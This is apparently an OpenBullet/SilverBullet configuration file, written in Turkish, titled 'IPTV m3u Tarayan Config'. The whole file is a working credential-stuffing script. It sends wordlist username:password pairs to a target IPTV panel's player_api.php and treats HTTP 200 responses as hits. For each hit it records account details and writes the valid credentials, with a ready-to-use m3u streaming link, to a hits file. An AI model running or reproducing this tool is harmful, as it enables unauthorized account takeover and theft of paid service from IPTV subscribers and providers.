[SETTINGS]
{
  "Name": "IPTV m3u Tarayan Config",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-07-13T19:01:20.9489164+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Astronot",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Taramak İstediğiniz Sİteyi Yazın Örn bestbuyiptv.tv:8080 ",
      "VariableName": "URL",
      "Id": 1149483854
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "IPTV m3u Tarayan Config",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "http://<URL>/player_api.php" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: ca728936a01e639dc76df020195e0a86" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Host: <URL>" 
  HEADER "Cache-Control: no-store,no-cache" 
  HEADER "Pragma: no-cache" 
  HEADER "Connection: Keep-Alive" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "404" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 

PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "Kullanıcı Adı" 

PARSE "<SOURCE>" JSON "password" CreateEmpty=FALSE -> CAP "Şifre" 

PARSE "<SOURCE>" JSON "status" CreateEmpty=FALSE -> CAP "status" 

PARSE "<SOURCE>" JSON "is_trial" -> VAR "is_trial" 

FUNCTION Translate 
  KEY "1" VALUE "✔️" 
  KEY "0" VALUE "❌ " 
  KEY "2" VALUE "❌ " 
  "<is_trial>" -> CAP "Deneme Hesabı Mı?" 

KEYCHECK 
  KEYCHAIN Custom "Deneme Hesabı" OR 
    KEY "<Deneme Hesabı Mı?>" Contains "✔️" 

PARSE "<SOURCE>" JSON "created_at" -> VAR "created_at" 

FUNCTION UnixTimeToDate "dd.MM.yyy" "<created_at>" -> CAP "Başlangıç Tarihi" 

PARSE "<SOURCE>" JSON "exp_date" -> VAR "exp_date" 

FUNCTION UnixTimeToDate "dd.MM.yyyy" "<exp_date>" -> CAP "Bitiş Tarihi" 

PARSE "<SOURCE>" JSON "max_connections" CreateEmpty=FALSE -> CAP "Maksimum Cihaz Sayısı" 

UTILITY File "IPTV HİTS.txt" AppendLines "----------IPTV----------\\n\\n[+] DATA : <USER>:<PASS>\\n[+] AKTİFLİK? : <status>\\n[+] Deneme Hesabı Mı? : <Deneme Hesabı Mı?>\\n[+] Başlangıç Tarihi : <Başlangıç Tarihi>\\n[+] Bitiş Tarihi : <Bitiş Tarihi>\\n[+] Maksimum Cihaz Sayısı : <Maksimum Cihaz Sayısı>\\n[+] M3U Linki : http://<URL>/get.php?username=<USER>&password=<PASS>&type=m3u_plus&output=m3u8\\n\\n" 

